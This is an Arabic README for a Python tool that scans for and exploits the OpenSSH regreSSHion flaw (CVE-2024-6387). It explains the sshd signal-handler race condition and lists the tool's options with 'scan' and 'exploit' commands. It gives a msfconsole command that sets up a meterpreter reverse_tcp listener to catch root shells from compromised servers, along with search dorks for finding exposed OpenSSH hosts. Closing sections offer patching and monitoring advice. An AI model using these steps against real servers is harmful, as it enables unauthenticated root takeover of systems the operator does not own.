
ثغرة تنفيذ كود عن بُعد بدون مصادقة في خادم OpenSSH (CVE-2024-6387)
CVE-2024-6387.py - PoCيعمل الاستغلال فقط على خوادم OpenSSH ذات 32 بت. وذلك لأن الإثبات يستخدم مؤشرات 32 بت! ومن المعروف أيضًا أن بعض الإصدارات قد تم تصحيحها بالفعل، وليس كل خادم معرض للخطر. تم اختباره على: Kali Linux، ParrotSec، Ubuntu 22.04
ثغرة تنفيذ كود عن بعد غير مصادق عليه في خادم OpenSSH
CVE-2024-6387.py هي أداة خفيفة الوزن وفعالة مصممة لتحديد الخوادم التي تشغل إصدارات معرضة للخطر من OpenSSH، وتستهدف تحديدًا ثغرة regreSSHion المكتشفة حديثًا (CVE-2024-6387). يسهل هذا البرنامج النصي المسح السريع لعناوين IP متعددة وأسماء النطاقات ونطاقات شبكة CIDR لاكتشاف الثغرات المحتملة وضمان أمان بنيتك التحتية.
تم العثور على حالة سباق في معالج الإشارة في خادم sshd الخاص بـ OpenSSH، حيث لا يقوم العميل بالمصادقة خلال ثوانٍ LoginGraceTime (120 ثانية افتراضيًا، 600 ثانية في إصدارات OpenSSH القديمة)، ثم يتم استدعاء معالج SIGALRM الخاص بـ sshd بشكل غير متزامن. ومع ذلك، يقوم معالج الإشارة هذا باستدعاء وظائف مختلفة ليست آمنة للإشارات غير المتزامنة، على سبيل المثال، syslog().
يمكنك العثور على التفاصيل الفنية هنا.
الخلل، الذي اكتشفه باحثون في Qualys في مايو 2024، وتم تعيين المعرف CVE-2024-6387 له، يرجع إلى حالة سباق في معالج الإشارة في sshd تسمح للمهاجمين عن بعد غير المصادق عليهم بتنفيذ كود عشوائي كجذر.
"إذا لم يقم العميل بالمصادقة خلال ثوانٍ LoginGraceTime (120 ثانية افتراضيًا)، فإن معالج SIGALRM الخاص بـ sshd يتم استدعاؤه بشكل غير متزامن ويستدعي وظائف مختلفة ليست آمنة للإشارات غير المتزامنة،"
"يمكن للمهاجم عن بعد غير المصادق عليه الاستفادة من هذا الخلل لتنفيذ كود عشوائي بصلاحيات الجذر."
المتطلب: أحدث إصدار من python3
### وسائط سطر الأوامر
mode: يحدد وضع التشغيل. الخيارات هي scan أو exploit.
-T, --targets: عناوين IP أو أسماء نطاقات أو مسارات ملفات تحتوي على عناوين IP أو نطاقات شبكة CIDR.
-f, --outputfile: ملف لحفظ النتائج (مثل result.json).
-g, --gracetimecheck: الوقت بالثواني للانتظار بعد تحديد الإصدار للتحقق من تخفيف LoginGraceTime (الافتراضي: 120 ثانية).
-n, --nic: بطاقة شبكة NIC (الافتراضي: 'eth0').
-o, --output: تنسيق المخرجات للنتائج (الخيارات: 'csv', 'txt', 'json').
-p, --port: رقم المنفذ للفحص أو الاستغلال (الافتراضي: 22).
-s, --speed: عدد الخيوط لزيادة فرص حالة السباق (الافتراضي: 10).
-t, --timeout: مهلة الاتصال بالثواني (الافتراضي: 1 ثانية).
-H, --resolve-hostnames: حل أسماء المضيفين
python3 CVE-2024-6387.py scan -T example.com -p 22
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
كل ما عليك فعله هو تشغيل الأمر أدناه أولاً (قم بتغيير معالج {yourip}) ثم قم بتشغيل الاستغلال بعد ذلك بالأمر أعلاه
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"
توفر الأداة مخرجات ملونة لوحدة التحكم لسهولة القراءة:
الأخضر: اتصال أو عملية ناجحة. الأحمر: فشل الاتصال أو خطأ. الأصفر: تحذيرات أو معلومات جديرة بالملاحظة. السماوي: معلومات عامة أو تحديثات الحالة.
/product.name="OpenSSH"app="OpenSSH"product:"OpenSSH"(openssh) and labels=remote-accessإدارة التصحيحات: يعد تطبيق تصحيحات OpenSSH المتاحة بسرعة أمرًا بالغ الأهمية لسد فجوة الثغرة. يضمن التصحيح في الوقت المناسب عدم إمكانية استخدام الاستغلالات المعروفة ضد أنظمتك، مما يقلل من فرصة المهاجمين.
تعزيز التحكم في الوصول: يضيف تقييد الوصول إلى SSH عبر ضوابط قائمة على الشبكة طبقة دفاع إضافية. يقلل هذا النهج من التعرض للمهاجمين المحتملين عن طريق قصر اتصالات SSH على الشبكات أو عناوين IP المصرح بها فقط. يمكن أن يؤدي تنفيذ أدوات مثل قواعد جدار الحماية أو استخدام شبكات VPN للوصول الآمن إلى فرض هذه القيود بشكل فعال.
تقسيم الشبكة: يساعد تقسيم شبكتك إلى قطاعات في احتواء تأثير الاختراق المحتمل. من خلال تقسيم الأنظمة الهامة والبيانات الحساسة عن الأجزاء الأقل أهمية في شبكتك، فإنك تقلل من خطر الحركة الجانبية للمهاجمين. يمكن استكمال هذا التقسيم بضوابط وصول صارمة ومراقبة لكشف والرد على أي محاولات غير مصرح بها لاختراق هذه القطاعات.
أنظمة كشف التسلل (IDS): يتيح نشر أنظمة كشف التسلل أو أنظمة منع التسلل (IPS) المراقبة في الوقت الفعلي لحركة مرور الشبكة وسجلات النظام. يمكن لهذه الأنظمة اكتشاف الأنشطة المشبوهة ومحاولات الاستغلال المحتملة المرتبطة بثغرة regreSSHion. تسمح التنبيهات التي تطلقها هذه الأنظمة بالتحقيق والتخفيف الفوري قبل حدوث ضرر كبير.
مراقبة محاولات الاستغلال: تعد المراقبة المستمرة لسجلات الشبكة والنظام أمرًا بالغ الأهمية. ابحث عن أي أنماط أو أنشطة غير عادية قد تشير إلى محاولة لاستغلال ثغرة OpenSSH. يساعد هذا النهج الاستباقي في تحديد التهديدات والرد عليها قبل أن تتمكن من إحداث ضرر.